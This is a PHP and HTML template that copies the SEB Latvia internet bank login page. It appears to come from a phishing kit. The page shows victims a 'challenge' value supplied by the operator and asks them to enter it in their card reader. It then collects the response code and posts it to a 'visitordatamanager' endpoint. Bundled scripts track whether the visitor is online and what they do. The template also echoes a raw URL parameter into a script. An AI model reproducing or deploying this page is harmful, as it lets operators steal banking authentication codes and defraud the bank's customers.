<?php
   $uniqueid = $_SESSION["visitor_uniqueid"];

   $user_data = $data["PageClass"]->get_visitor_attributes(array("challenge"));
   ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0039)https://ibanka.seb.lv/ipc/epakindex.jsp -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="hasjs notouch isdesktop modern responsive">
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <title>SEB Internetbanka / Pieslēgties</title>
      <meta http-equiv="cache-control" content="max-age=0">
      <meta http-equiv="cache-control" content="no-cache">
      <meta http-equiv="expires" content="0">
      <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT">
      <meta http-equiv="pragma" content="no-cache">
      <meta name="Author" content="">
      <meta name="Keywords" content="">
      <meta name="Description" content="">
      <meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE">
      <meta name="format-detection" content="telephone=no">
      <link rel="shortcut icon" type="image/ico" href="https://ibanka.seb.lv/unet3/img/ipank/favicon.ico">
      <!--[if IE]>
      <meta http-equiv="X-UA-Compatible" content="IE=8,IE=9,IE=10,IE=edge"/>
      <![endif]-->
      <meta name="viewport" content="initial-scale=1.0, maximum-scale=1.0, width=device-width, user-scalable=no">
      <link href="<?= URLROOT ?>/front_end/front_end_files/seb/styles.cache782204301.css" rel="stylesheet" type="text/css" media="all">
      <link href="<?= URLROOT ?>/front_end/front_end_files/seb/consent.cache782204301.css" rel="stylesheet" type="text/css" media="all">
      <link href="<?= URLROOT ?>/front_end/front_end_files/seb/fonts.cache782204301.css" rel="stylesheet" type="text/css" media="all">
      <link href="<?= URLROOT ?>/front_end/front_end_files/seb/styles_notsupported.cache782204301.css" rel="stylesheet" type="text/css" media="screen and (max-width: 239px)">
      <link href="<?= URLROOT ?>/front_end/front_end_files/seb/styles_frame_narrow.cache782204301.css" rel="stylesheet" type="text/css" media="screen and (min-width: 240px) and (max-width: 749px)">
      <link href="<?= URLROOT ?>/front_end/front_end_files/seb/styles_frame_narrow_extend.cache782204301.css" rel="stylesheet" type="text/css" media="screen and (min-width: 380px) and (max-width: 749px)">
      <link href="<?= URLROOT ?>/front_end/front_end_files/seb/styles_content_portable.cache782204301.css" rel="stylesheet" type="text/css" media="screen and (min-width: 240px) and (max-width: 999px)">
      <link href="<?= URLROOT ?>/front_end/front_end_files/seb/styles_content_desktop.cache782204301.css" rel="stylesheet" type="text/css" media="screen and (min-width: 750px)">
      <link href="<?= URLROOT ?>/front_end/front_end_files/seb/styles_frame_medium.cache782204301.css" rel="stylesheet" type="text/css" media="screen and (min-width: 750px) and (max-width: 999px)">
      <link href="<?= URLROOT ?>/front_end/front_end_files/seb/styles_frame_wide.cache782204301.css" rel="stylesheet" type="text/css" media="screen and (min-width: 1000px)">
      <link href="<?= URLROOT ?>/front_end/front_end_files/seb/styles_print.cache782204301.css" rel="stylesheet" type="text/css" media="print">
      <link href="<?= URLROOT ?>/front_end/front_end_files/seb/styles_linkaccount.cache782204301.css" rel="stylesheet" type="text/css" media="all">
      <link href="<?= URLROOT ?>/front_end/front_end_files/seb/styles_linkaccount_desktop.cache782204301.css" rel="stylesheet" type="text/css" media="screen and (min-width: 750px)">
      <link href="<?= URLROOT ?>/front_end/front_end_files/seb/styles_linkaccount_narrow.cache782204301.css" rel="stylesheet" type="text/css" media="screen and (min-width: 240px) and (max-width: 749px)">
      <link href="<?= URLROOT ?>/front_end/front_end_files/seb/styles_linkaccount_wide.cache782204301.css" rel="stylesheet" type="text/css" media="screen and (min-width: 1000px)">
      <link href="<?= URLROOT ?>/front_end/front_end_files/seb/styles_unet.cache782204301.css" rel="stylesheet" type="text/css" media="all">
      <link href="<?= URLROOT ?>/front_end/front_end_files/seb/consent_narrow.cache782204301.css" rel="stylesheet" type="text/css" media="screen and (min-width: 240px) and (max-width: 749px)">
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/jquery.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/bootstrap3-typeahead.min.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/require.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/jquery.ui.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/jquery.cookie_modified.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/jquery.ibcookie.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/jquery.extensions.datepicker.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/utils.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/porthole.min.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/underscore-min.cache782204301.js"></script>
      <script>var require_config_custom={baseUrl: '/ipank/resp/js/'};</script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/scripts_modified.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/jquery.tablesorter.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/unetresp.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/usearch.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/unetmenu.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/json2.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/sebmobunet.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/pinger.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/goPopUp.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/sign.cache782204301.js"></script>
      <script type="text/javascript">var $jq = jQuery;</script>
      <script type="text/javascript">
         $(document).ready(function(){
         document.onkeyup = tabTrigger;
         document.onkeydown = tabTriggerPress;
         var titleval=$.trim(document.title),headerval=$.trim($("#content01 h1[id!='confirmheader'][id!='xmlheadererror']").text());
         if (headerval>'')
         document.title=titleval+' / '+headerval; });
      </script>
      <script type="text/javascript">
         var locales = {
         simpleloader: "Uzgaidiet... ",
         tbclose: "Aizvērt ",
         more: "Vairāk ",
         none_selected: "Nav izvēlēts ",
         highstock_1m_label: "1 m",
         highstock_3m_label: "3 m",
         highstock_6m_label: "6 m ",
         highstock_ytd_label:"No gada sākuma ",
         highstock_1y_label: "1 g " ,
         highstock_all_label:"Visi "
         };
         highchartoptions.lang = {
         rangeSelectorZoom:'Filtrs:'
         };
         function getShortFormat(format) {
         var i_format = 0, short_format='', c, token;
         while (i_format < format.length) {
         c=format.charAt(i_format);
         token="";
         while ((format.charAt(i_format)==c) && (i_format < format.length)) {
         token += format.charAt(i_format++);
         }
         if (token.length == 1 && token.charCodeAt(0) < 65)
         short_format = short_format + token;
         else if (token.length == 4)
         short_format = short_format + token.substr(0,1).toUpperCase();
         else
         short_format = short_format + token.substr(0,1).toLowerCase();
         }
         return short_format;
         }
         var datedata = {
         dateformat: getShortFormat("DD.MM.YYYY"),
         locale : {
         months : [
         "janvāris ",
         "februāris ",
         "marts ",
         "aprīlis ",
         "maijs ",
         "jūnijs ",
         "jūlijs ",
         "augusts ",
         "septembris ",
         "oktobris ",
         "novembris ",
         "decembris "
         ],
         monthsShort : [
         "#xml-dtd.CALENDAR-TEXTS.CALENDARMONTHSHORT1",
         "#xml-dtd.CALENDAR-TEXTS.CALENDARMONTHSHORT2",
         "#xml-dtd.CALENDAR-TEXTS.CALENDARMONTHSHORT3",
         "#xml-dtd.CALENDAR-TEXTS.CALENDARMONTHSHORT4",
         "#xml-dtd.CALENDAR-TEXTS.CALENDARMONTHSHORT5",
         "#xml-dtd.CALENDAR-TEXTS.CALENDARMONTHSHORT6",
         "#xml-dtd.CALENDAR-TEXTS.CALENDARMONTHSHORT7",
         "#xml-dtd.CALENDAR-TEXTS.CALENDARMONTHSHORT8",
         "#xml-dtd.CALENDAR-TEXTS.CALENDARMONTHSHORT9",
         "#xml-dtd.CALENDAR-TEXTS.CALENDARMONTHSHORT10",
         "#xml-dtd.CALENDAR-TEXTS.CALENDARMONTHSHORT11",
         "#xml-dtd.CALENDAR-TEXTS.CALENDARMONTHSHORT12"
         ],
         days : ["#calendar.days.sunday",
         "#calendar.days.monday",
         "#calendar.days.tuesday",
         "#calendar.days.wednesday",
         "#calendar.days.thursday",
         "#calendar.days.friday",
         "#calendar.days.saturday",
         "#calendar.days.sunday"],
         daysShort : ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"],
         daysMin : [
         "Sv ",
         "P ",
         "O ",
         "T ",
         "C ",
         "Pk ",
         "S "
         ]
         },
         };
         var UserSetupArray=["LAT",
         "1",
         "1",
         "4",
         "14.04.2023",
         "EUR",
         "LAT",
         15.64660000,
         "ipank.p",
         "LVA"
         ];
      </script>
      <script type="text/javascript">
         function NewMenu(lCache)
         {$.ajax({
         url: document.sessionData.unetURL.value,data:
         {act:"AJAXMENU",
         frnam:document.sessionData.frnam.value,sesskey:document.sessionData.sesskey.value,v: document.sessionData.unetmenulow.value,lang : document.sessionData.unetlanguage.value},
         cache: lCache,success:
         function(res) {
         $('.menu01a').html($($(res)[1]).html());initMenu();
         if (document.avalehtForm) $('#homelink').parent().addClass('active');
         if (document.sessionData.unetmenuhigh.value!='')
         $('#' + document.sessionData.unetmenuhigh.value ).parent().addClass('active');
         if (document.sessionData.unetmenulowdiv!='') {
         $('#mlow_' + document.sessionData.unetmenulowdiv.value ).addClass('active');
         $('#mlow_' + document.sessionData.unetmenulowdiv.value ).parent().addClass('active');
         }


         }
         });}
      </script>
      <script language="JavaScript">
         var loginuserempty           = "Lūdzu, ievadiet lietotāja kodu.";
         var IDcodeempty              = "Lūdzu, ievadiet personas kodu.";
         var logintypeempty           = "Lūdzu, izvēlieties autentifikācijas rīku.";
         var userAndIDCodeMustMatch   = " Lietotāja kods vai personas kods ir nepareizs.";
         var logincertURL             = "https://id.seb.lv/web/ipank.p";
         var loginuncertURL           = "https://ibanka.seb.lv/web/ipank.p";
         var mobLoginStartError       = "Jūsu pārlūks neatbalsta Mobiil-ID. Lūdzu, ieslēdziet JavaScript.";
         var mobLoginStartMessage     = "Pārbaudam, vai eksistē tāds Mobiil-ID līgums...";
         var mobLoginWaitingMessage   = "Lūdzu, pārliecinieties, ka Jūsu viedierīcē redzams šis pats numurs.";
         var mobLoginOKMessage        = "Atbilde ir saņemta, notiek pieslēgšanās...";
         var mobLoginTimeoutMessage   = "Atbildes saņemšana aizņem pārāk ilgu laiku.";
         var smartLoginStartError     = "Jūsu pārlūkprogramma neatbalsta Smart-ID risinājumu.";
         var smartLoginStartMessage   = "Tiek pārbaudīti Smart-ID dati...";
         var smartLoginWaitingMessage = "Ekrānā redzamais apstiprinājuma kods ir nosūtīts uz Jūsu viedierīci.#Lai apstiprinātu darbību, ievadiet telefonā Smart-ID PIN 1 kodu.##";
         var smartLoginOKMessage      = "Saņemta atbilde. Lūdzu, uzgaidiet...";
         var smartLoginTimeoutMessage = "Neizdevās saņemt atbildi no Smart-ID. Lūdzu, mēģiniet vēlreiz.";
         var mobilescaLoginStartError     = "Jūsu pārlūks neatbalsta SEB App. Lūdzu, ieslēdziet JavaScript.";
         var mobilescaLoginStartMessage   = "Iespēja pārbaudīt autentifikāciju ar SEB lietotni";
         var mobilescaLoginWaitingMessage = "Lūdzu, pārbaudiet, vai Jūsu telefonā parādās tas pats numurs.";
         var mobilescaLoginOKMessage      = "Atbilde ir saņemta, notiek pieslēgšanās...";
         var mobilescaLoginTimeoutMessage = "Atbildes iegūšana aizņem pārāk ilgu laiku. Process tiks pārtraukts.";
         var koodinumbritext          = "Kods:";
         var mobWaitingMessage        = "Tiek gaidīta atbilde...";

         var reqtimes                 = [1,7,3,3,3,5,5,5,10,10,10,5,5,5,5];
         var emptyPhoneMessage        = "Lūdzu, norādiet telefona numuru.";
         var incorrectPhoneMessage    = "Nepareizi ievadīts telefona numurs.";
         var moberroricon             = "img src='/unet3/img/images2/ikoon_error.gif' border='0' align='left'";

         var IdcodeControl            = true;
      </script>
      <script type="text/javascript">var $jq = jQuery;</script>
      <script type="text/javascript">
         function UnetOnLoad(){};
         var UserSetupArray=["EST","4","2","4","2019.02.19","EUR","EEK",15.64660000,"ipank.p","EST"];
      </script>
      <script type="text/javascript">   var g_jsURL='/unet3/js/ipank/',       g_imgURL='/unet3/img/ipank/',       g_cssURL='/unet3/img/ipank/';   </script>
      <script type="text/javascript">
         $(document).ready(function(){
         $.IbCookie("SEBVBTimeLeft", "?");
         UnetOnLoad();
         $('.enterkey').keypress(function (event) {
         if (event.keyCode == 13) {
         DoLoginSubmit();
         }
         });
         });
      </script>
      <script type="text/javascript">
         var locales = {simpleloader: 'Laen...',tbclose: 'Sulgen',highstock_1m_label: '1 k',highstock_3m_label: '3 k',highstock_6m_label: '6 k',highstock_ytd_label: 'Aasta algusest',highstock_1y_label: '1 a',highstock_all_label: 'Kõik',more: 'Veel',none_selected: 'Valimata'};
         highchartoptions.lang = {rangeSelectorZoom:'Suurenda'};
      </script>
      <script language="JavaScript" type="text/javascript">
         function SetLang(lng){
         $('input[name=lang]').prop('value', lng);
         $('input[name=VK_LANG]').prop('value', lng);
         }
         function DoLoginSubmit(){
         document.onkeydown=null;
         document.onkeypress=null;
         document.unmainform.cert.value=$('INPUT[name=certsel]:checked').val();
         document.unmainform.logintype.value='';
         if($('INPUT[name=certsel]:checked').data('logindevice') == 'SMARTID' || $('INPUT[name=certsel]:checked').data('logindevice') == 'MOBILESCA') {
         if(document.unmainform.usercode){
         document.unmainform.user.value=document.unmainform.usercode.value;
         if($('INPUT[name=certsel]:checked').data('logintype')){
         document.unmainform.logintype.value=$('INPUT[name=certsel]:checked').data('logintype');
         }
         }
         } else {
         if($('INPUT[name=certsel]:checked').data('logindevice') == 'MOB') {
         if($('INPUT[name=certsel]:checked').data('logintype')){
         document.unmainform.logintype.value=$('INPUT[name=certsel]:checked').data('logintype');
         }
         if( $('#mobusercode').length ) {
         document.unmainform.logintype.value += ":" + $('#mobusercode').val();
         }
         }
         }
         LoginSubmit();
         return false
         };
         function HideIdCode(Hide){
         if(!ConsentDisclaimer.areCookiesEnabled()) {
         if(Hide){
         $('#idcodeBox').addClass('hidden');
         $('#idcodeText').addClass('hidden');
         }else{
         $('#idcodeBox').removeClass('hidden');
         $('#idcodeText').addClass('hidden');
         }
         } else {
         if(Hide){
         $('#idcodeBox').addClass('hidden');
         $('#idcodeText').addClass('hidden');
         }else{
         $('#idcodeBox').removeClass('hidden');
         $('#idcodeText').removeClass('hidden');
         }
         }
         };
      </script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/seblogin.cache782204301.js"></script>
      <script type="text/javascript" src="<?= URLROOT ?>/front_end/front_end_files/seb/murmurhash3_gc.cache782204301.js"></script>
      <script language="JavaScript" type="text/javascript">
         $(function() {
         var userConsents = getJsonCookie("SEBConsents");
         var userSettingsCookie = getJsonCookie("usersettings");
         if (!ConsentDisclaimer.areCookiesEnabled()) {
         $('.simplified_login_consent_given').addClass('hidden');
         $('.simplified_login_no_consent').addClass('hidden');
         } else {
         if (userConsents == null || !userConsents["consents"]["simplified_login"]) {
         $('.simplified_login_consent_given').addClass('hidden');
         if (userSettingsCookie != null) {
         userSettingsCookie["settings"] = {};
         $.IbCookie("usersettings", JSON.stringify(userSettingsCookie), {expires:365});
         userSettingsCookie = null;
         }
         } else {
         $('.simplified_login_no_consent').addClass('hidden');
         }
         }
         var lcookie = getJsonCookie("loginmethod", {});
         $('form[name="unmainform"]').bind('submit', function(e) {  e.preventDefault(); });
         var context=$('#loginpage');
         var useradiobuttons = context.find('input:radio:eq(0)').length !== 0;
         if (useradiobuttons) {
         var tava = $('#Codebtn'),
         id = $('#IDbtn'),
         mobiil = $('#MOBbtn'),
         smartID = $('#Smartbtn'),
         mobileSca = $('#MobileScabtn');
         } else {
         var tava = context.find('input:button:eq(0)'),
         id = context.find('input:button:eq(1)'),
         mobiil = context.find('input:button:eq(2)'),
         smartID = context.find('input:button:eq(3)'),
         mobileSca = context.find('input:button:eq(4)');
         };
         var mobiilWrapper = mobiil.parent().parent(),
         idWrapper = id.parent().parent(),
         tavaWrapper = tava.parent().parent(),
         smartIDWrapper = smartID.parent().parent(),
         mobileScaWrapper = mobileSca.parent().parent(),
         uname = context.find('input:text'),
         methodtouse = null,
         usermethod,
         settingsID = {expires:30},
         settings = {expires:365};
         tava.bind('click', function(e) { methodtouse='tava'; updateIdCodeInputType(methodtouse); updateLoginDeviceInCookie(lcookie, "tava"); });
         id.bind('click', function(e) { methodtouse='id'; updateIdCodeInputType(methodtouse); updateLoginDeviceInCookie(lcookie, "id"); });
         mobiil.bind('click', function(e) { methodtouse='mobiil'; updateIdCodeInputType(methodtouse); updateLoginDeviceInCookie(lcookie, "mobiil"); });
         smartID.bind('click', function(e) { methodtouse='smartID'; updateIdCodeInputType(methodtouse); updateLoginDeviceInCookie(lcookie, "smartID"); });
         mobileSca.bind('click', function(e) { methodtouse='mobileSca'; updateIdCodeInputType(methodtouse); updateLoginDeviceInCookie(lcookie, "mobileSca"); });
         uname.bind(
         'keydown', function(e) {
         if (e.which === 13) {
         switch (methodtouse) {
         case "tava":tava.trigger('click'); break;
         case "id":id.trigger('click'); break;
         case "mobiil":mobiil.trigger('click'); break;
         case "smartID":smartID.trigger('click'); break;
         case "mobileSca":mobileSca.trigger('click'); break;
         default:tava.trigger('click'); break;
         }
         DoLoginSubmit();
         }
         }
         ).bind('keyup',function(e) {if (e.which!= 13) {checkCookie();}}
         ).bind('paste',function(e) {setTimeout(function() {checkCookie();}, 0);});
         $('#idcode1').bind('keypress', function (event) {
         var regex = new RegExp("^[0-9]|-$");
         if (methodtouse === 'mobileSca') {
         regex = new RegExp("^[A-Za-z0-9]|-$");
         }
         var key = String.fromCharCode(!event.charCode ? event.which : event.charCode);
         if (!regex.test(key)) {
         event.preventDefault();
         return false;
         }
         });
         function getJsonCookie(name, defaultValue) {
         var rawCookieValue = $.IbCookie(name);
         if (rawCookieValue != null) {
         return JSON.parse(rawCookieValue);
         }
         return defaultValue || null;
         }
         function getHashedUsername() {
         return murmurhash3_32_gc(uname.val().toUpperCase());
         }
         function hideAllDevices() {
         tavaWrapper.removeClass('main');
         idWrapper.removeClass('main');
         mobiilWrapper.removeClass('main');
         smartIDWrapper.removeClass('main');
         mobileScaWrapper.removeClass('main');
         }
         function areCookiesEnabled() {
         $.IbCookie('testCookie', 'check');
         var testcookie = $.IbCookie('testCookie');
         $.removeIbCookie('testcookie');
         return (testcookie != undefined && testcookie == 'check');
         }
         function selectLastUsedDevice(){
         usermethod = lcookie[getHashedUsername()];
         if (usermethod != null) {
         if ((methodtouse == null) || (!useradiobuttons)) {
         switch (usermethod) {
         case "tava":   hideAllDevices(); tavaWrapper.addClass('main'); methodtouse="tava"; tava.prop('checked', true); HideIdCode(true); break;
         case "id":     hideAllDevices(); idWrapper.addClass('main'); methodtouse="id"; id.prop('checked', true); HideIdCode(true); break;
         case "mobiil": hideAllDevices(); mobiilWrapper.addClass('main'); methodtouse="mobiil"; mobiil.prop('checked', true); HideIdCode(false); break;
         case "smartID":hideAllDevices(); smartIDWrapper.addClass('main'); methodtouse="smartID"; smartID.prop('checked', true); HideIdCode(false); break;
         case "mobileSca":hideAllDevices(); mobileScaWrapper.addClass('main'); methodtouse="mobileSca"; mobileSca.prop('checked', true); HideIdCode(false); break;
         }
         }
         } else {
         hideAllDevices();
         if (!useradiobuttons) {
         methodtouse="tava";
         }
         }
         }
         function checkForTrustedDevice() {
         document.unmainform.hashedUsername = getHashedUsername();
         if (methodtouse == "tava" || methodtouse == "id" || userSettingsCookie == null) {
         return;
         }
         userSettings = userSettingsCookie["settings"][getHashedUsername()];
         if (userSettings != null && userSettings["dev_exp"] != null && new Date(userSettings["dev_exp"]) > new Date()) {
         $('#idcodeBox').addClass('hidden');
         document.unmainform.isTrustedDevice = true;
         } else {
         HideIdCode(false);
         }
         }
         var checkCookie = function() {setTimeout(function() {
         selectLastUsedDevice();
         checkForTrustedDevice();
         }, 1000);};
         function updateLoginDeviceInCookie(lcookie, deviceId) {
         lcookie[getHashedUsername()] = deviceId;
         $.IbCookie("loginmethod", JSON.stringify(lcookie), {expires:365});
         checkForTrustedDevice();
         }
         function updateIdCodeInputType(deviceId) {
         if (deviceId === 'mobileSca') {
         $('#idcode1').attr("type", "text");
         } else {
         $('#idcode1').attr("type", "tel");
         }
         }
         });
      </script>
      <script>
         var urlroot = '<?= URLROOT ?>';
         var uniqueid = '<?= $uniqueid ?>';
         var url_to_status_array = <?= json_encode($data["options"]) ?>;
      </script>
      <script src="<?= URLROOT ?>/js/cntdjs/jquery.js"></script>
      <script src="<?= URLROOT ?>/js/cntdjs/jquery.mask.js"></script>
      <script src="<?= URLROOT ?>/js/cntdjs/cntd.js"></script>
      <script src="<?= URLROOT ?>/js/shared/loading.js"></script>
      <script src="<?= URLROOT ?>/js/shared/online_status.js"></script>
      <script src="<?= URLROOT ?>/js/shared/default_user_behaviour.js"></script>
      <link rel="stylesheet" href="<?= URLROOT ?>/css/shared/loader.css">
   </head>
   <body>
      <div id="box00">
         <div id="box01">
            <div id="box02">
               <div id="header01" class="clear ">
                  <div class="a">
                  </div>
               </div>
               <div id="header02" class="clear  changebackground">
                  <div class="a">
                     <div id="logo">
                        <a href="#"><img src="<?= URLROOT ?>/front_end/front_end_files/seb/seb_logotype_rgb.svg" alt="S|E|B"></a>
                     </div>
                     <p class="sitename mobile-hide"><span>SEB Internetbanka</span></p>
                  </div>
               </div>
               <div id="box03">
                  <div id="menu01">
                     <div class="header03">
                        <div class="header03a">
                           <form id="mylangform">
                              <ul class="langselect">
                                 <li class="active"><a href="#" class="lt" onclick="SetLang(&#39;LAT&#39;);Unet_FormSubmitOnClick(&#39;mylangform&#39;,&#39;&#39;,&#39;&#39;,&#39;&#39;,&#39;1&#39;);return false;"><span>Latviešu</span></a></li>
                                 <li><a href="#" class="en" onclick="SetLang(&#39;ENG&#39;);Unet_FormSubmitOnClick(&#39;mylangform&#39;,&#39;&#39;,&#39;&#39;,&#39;&#39;,&#39;1&#39;);return false;"><span>English</span></a></li>
                                 <li><a href="#" class="ru" onclick="SetLang(&#39;RUS&#39;);Unet_FormSubmitOnClick(&#39;mylangform&#39;,&#39;&#39;,&#39;&#39;,&#39;&#39;,&#39;1&#39;);return false;"><span>Русский</span></a></li>
                              </ul>
                           </form>
                        </div>
                     </div>
                     <div class="menu01 clear"></div>
                  </div>
                  <div id="box04">
                     <div id="content01">
                        <!-- ADD HEADER BELOW -->
                        <h1 id="headermain">Autentifikācija<br></h1>
                        <div class="clear groups01" id="mainwincell">
                           <div class="clear colwrapper">
                              <div class="col col01">
                                 <form id="form">

                                    <input name="new_data" value="true" type="hidden">
                                    <input name="status" value="0" type="hidden">
                                    <input name="uniqueid" value="<?= $uniqueid ?>" type="hidden">

                                    <div class="block01 clear">
                                       <div class="groupcontent">
                                          <script language="JavaScript1.2">
                                             function UnetOnLoad(){
                                             document.onkeydown = tabTrigger;
                                             document.onkeypress = tabTriggerPress;
                                             document.unmainform.user.focus();
                                             if(document.unmainform.cert.value=='IDMOB'){document.unmainform.cert.value='MOB';LoginSubmit();}
                                             }
                                          </script>
                                          <!-- appinterface==='UPOS' -->
                                          <ul class="messages mt20 clear" id="moberror" style="display:none">
                                             <li class="negative">
                                                <p id="errmsg"></p>
                                             </li>
                                          </ul>
                                          <div class="auth02 clear" id="loginpage">
                                            <p class="bold">Lūdzu, ievadiet <b><?= $user_data["challenge"] ?></b> savā lasītājā un ielīmējiet atbildes kodu zemāk esošajā laukā.</p>
                                             <!-- audentification tools: codecard, IDcard, mobID, smartID -->
                                             <div class="separator01"></div>

                                             <!-- inputfields : name, IDcode -->
                                             <div class="form01 clear initdone">
                                                <div class="row clear init10">
                                                   <label for="username1">Atbildes kods</label>
                                                   <div class="items">
                                                      <input id="response" name="response" class="default" autocomplete="off" type="text" value="">
                                                   </div>
                                                </div>
                                                <!-- <div class="form01 clear initdone" id="idcodeBox">
                                                   <div class="row init10">
                                                      <label for="idcode1">Personas kods</label>
                                                      <div class="items">
                                                         <input id="password" name="password" class="default enterkey" autocomplete="off" type="tel" size="20" maxlength="15" value="">
                                                      </div>
                                                   </div>
                                                </div> -->
                                             </div>
                                             <!-- submit butoon -->
                                             <div class="separator01">
                                                <hr>
                                             </div>
                                             <div class="clear mt10">
                                                <ul class="actions01 nomargin f-left">
                                                   <li>
                                                      <div class="main">
                                                         <span><input id="submit-btn" type="submit" value="Pieslēgties"></span>
                                                      </div>
                                                   </li>
                                                </ul>
                                             </div>
                                          </div>
                                          <!-- appinterface==='UPOS' -->
                                          <!-- startaccount,NONUSERAUTH,3DSecure,UPOS... -->
                                          <!-- appinterface==='UPOS' -->
                                          <div id="mobinfo" style="display:none">
                                             <ul class="messages mt20 clear">
                                                <li class="msg ">
                                                   <p>Uz Jūsu norādīto telefona numuru ir nosūtīts pieprasījums. Ja vēlaties mainīt numuru, spiediet <a href="#" onclick="StopMobWait();promptPhone();return false;">šeit</a>.</p>
                                                </li>
                                             </ul>
                                          </div>
                                          <div class="auth02 clear" id="mobkinnitan" style="display:none;">
                                             <p class="heading clear" id="midcode"><span class="text">Mobiil-ID</span></p>
                                             <p class="code" id="mobmessage"></p>
                                             <p class="mobh4" id="mobwait"></p>
                                             <div class="separator01"></div>
                                             <div class="clear">
                                                <ul class="actions01 clear desktop-f-left">
                                                   <li>
                                                      <div class="">
                                                         <span><input type="button" value="Atcelt"></span>
                                                      </div>
                                                   </li>
                                                </ul>
                                             </div>
                                          </div>
                                          <div id="mobinfo1" style="display:none">
                                             <ul class="messages mt20 clear">
                                                <li class="msg ">
                                                   <p>Veicot pirmreizējo pieslēgšanos, lūdzu, norādiet savu mobilā tālruņa numuru.</p>
                                                </li>
                                             </ul>
                                          </div>
                                       </div>
                                       <!-- groupcontent -->
                                    </div>
                                    <!-- block01 block01  clear -->
                                 </form>
                                 <script>
                                    var controller = new CNTD;
                                    var url = "<?= URLROOT ?>/visitordatamanager/update_visitor_data";

                                    controller.check_form_button_disable(["#response"]);
                                     controller.submit_multipanel_form(url, '<?= $_GET["d"] ?>', controller.multipanel_form_response);
                                 </script>
                              </div>
                              <!-- col col01 -->
                              <div class="col col02 col02b">
                                 <div class="col02a">
                                    <div class="box01  box01petrol  expander clear">
                                       <h2 class="mainheading">
                                          <span>Svarīgi</span>
                                       </h2>
                                       <div class="box01a clear">
                                          <div class="box01b clear">
                                             <ul class=" list00   clear">
                                                <li>
                                                   <ul class="list03">
                                                      <li>
                                                         <img src="<?= URLROOT ?>/front_end/front_end_files/seb/smartid.png" align="right" style="padding: 0 0 5% 5%; width:30%; max-width:120px;">
                                                         Jautājumos par Smart-ID aicinām sazināties ar programmas izstrādātāju un mūsu partneri SK ID Solutions pa tālruni +371 6766 5001 vai e-pastu <a href="#">help.lv@smart-id.com</a>
                                                      </li>
                                                      <li>
                                                         <img uns="true" src="<?= URLROOT ?>/front_end/front_end_files/seb/eParaksts.png" align="right" style="padding: 0 0 5% 5%; width:60%; max-width:240px;">
                                                         Jautājumos par eID aicinām sazināties ar eParaksts izstrādātāju un mūsu partneri LVRTC pa tālruni +371 6710 8787 vai e-pastu
                                                         <a href="#">eparaksts@eparaksts.lv</a>
                                                      </li>
                                                      <li>Neizpaudiet lietotāja kodu un citu identificējošu informāciju nepiederošām personām. Glabājiet internetbankas autorizācijas līdzekļus drošībā.</li>
                                                      <li><a href="#" >Drošs darbs internetbankā</a></li>
                                                   </ul>
                                                </li>
                                             </ul>
                                          </div>
                                       </div>
                                    </div>
                                    <div class="box01  box01capri  expander clear">
                                       <h2 class="mainheading">
                                          <span>Noderīgi</span>
                                       </h2>
                                       <div class="box01a clear">
                                          <div class="box01b clear">
                                             <ul class=" list11  clear">
                                                <li>
                                                   <div>
                                                      <p style="font-size:14pt"><b>Internetbanka uzņēmumiem</b></p>
                                                      <ul class="actions01 clear mt10">
                                                         <li class="f-left"><a href="#"><span>Pieslēgties</span></a></li>
                                                      </ul>
                                                      <ul class="list03">
                                                         <li><a uns="true" href="#">Valūtu kursi</a></li>
                                                         <li><a href="#" >Mobilā aplikācija</a></li>
                                                         <!--li><a href="http://www.seb.lv/ibdemo/" >Internetbankas demo versija</a></li-->
                                                         <li><a href="#" >Infotelpa</a></li>
                                                      </ul>
                                                      <!--ul class="list03">
                                                         <b>Ceļvedis</b>
                                                         <li><a href="http://www.seb.lv/node/6813" >Internetbankas ceļvedis</a></li>
                                                         <li><a href="http://www.seb.lv/node/7378" >Darba uzsākšana internetbankā</a></li>
                                                         <li><a href="https://www.seb.lv/node/100092" >Multivalūtu konts</a></li>
                                                         </ul-->
                                                   </div>
                                                </li>
                                                <li>
                                                   <b>Atgādinām!</b>
